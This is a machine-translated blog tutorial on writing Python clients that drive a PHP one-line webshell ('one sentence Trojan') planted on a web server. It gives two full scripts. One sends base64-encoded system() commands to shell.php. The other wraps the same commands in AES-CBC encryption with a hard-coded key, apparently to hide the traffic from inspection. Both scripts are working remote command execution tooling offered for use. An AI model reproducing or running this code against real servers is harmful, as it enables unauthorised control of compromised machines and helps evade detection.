I have written two articles before , But not much .
Use python Connect JSP In a word, Trojans
Use burpsuite Yes python Of post Request for packet capture
I remember today , So integrate , Get another encryption .
First of all Linux Write a in the virtual machine “ Two sentences ”.
Carry out a... On the parameter transfer base64 decode , This means that Windows This machine needs a base64 code .
import requests
import base64
url = str(input(' The goal is URL:')) # http://192.168.xxx.xxx/shell.php
pwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
# be used for burpsuite Grab the bag
proxy = {
'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
while(True):
cmd = input(' Enter the command to execute :')
send = "system(\'" + cmd + "\');"
connect = base64.b64encode(send.encode('utf-8'))
# Pass the command to the one sentence Trojan horse
payloads = {
pwd: connect
}
# To the goal url send out post request
# response = requests.post(url, payloads)
response = requests.post(url, payloads, proxies=proxy)
# Echo the results of command execution
print(response.text)
The results are as follows :
Decode it to see the command .
And then put the bag ,Python The code receives the returned data .
Yes shell.php Make changes .
Python The code is as follows :
import requests
import base64
from Crypto.Cipher import AES
# secret key (key), Mies offset (iv) CBC Mode encryption
BLOCK_SIZE = 16 # Bytes
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * \
chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
key = '5c47c819bpt3apr0'
vi = '0102030405060708'
def AES_Encrypt(key, data):
data = pad(data)
# String complement
cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
encryptedbytes = cipher.encrypt(data.encode('utf8'))
# After encryption, you get bytes Data of type , Use Base64 Encoding , return byte character string
encodestrs = base64.b64encode(encryptedbytes)
# Yes byte String press utf-8 decode
enctext = encodestrs.decode('utf8')
return enctext
def AES_Decrypt(key, data):
data = data.encode('utf8')
encodebytes = base64.decodebytes(data)
# Convert encrypted data to bits bytes Type data
cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
text_decrypted = cipher.decrypt(encodebytes)
# Go to make up for it
text_decrypted = unpad(text_decrypted)
text_decrypted = text_decrypted.decode('utf8')
print(text_decrypted)
return text_decrypted
if __name__ == '__main__':
url = str(input(' The goal is URL:')) # http://192.168.223.xxx.xxx/shell.php
pwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
# be used for burpsuite Grab the bag
proxy = {
'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
while(True):
cmd = input(' Enter the command to execute :')
send = "system(\'" + cmd + "\');"
# Pass the command to the one sentence Trojan horse
payloads = {
pwd: AES_Encrypt(key, send)
}
# To the goal url send out post request
# response = requests.post(url, payloads)
response = requests.post(url, payloads, proxies=proxy)
# Echo the results of command execution
print(response.text)
The code of these encryption and decryption algorithms , It is easy to find on the Internet .
You can also modify it yourself
Results obtained after capturing packets :
python stay Windows Next use AES when , To install pycryptodome modular
pip install pycryptodome
python stay Linux Next use AES when , To install pycrypto modular
pip install pycrypto
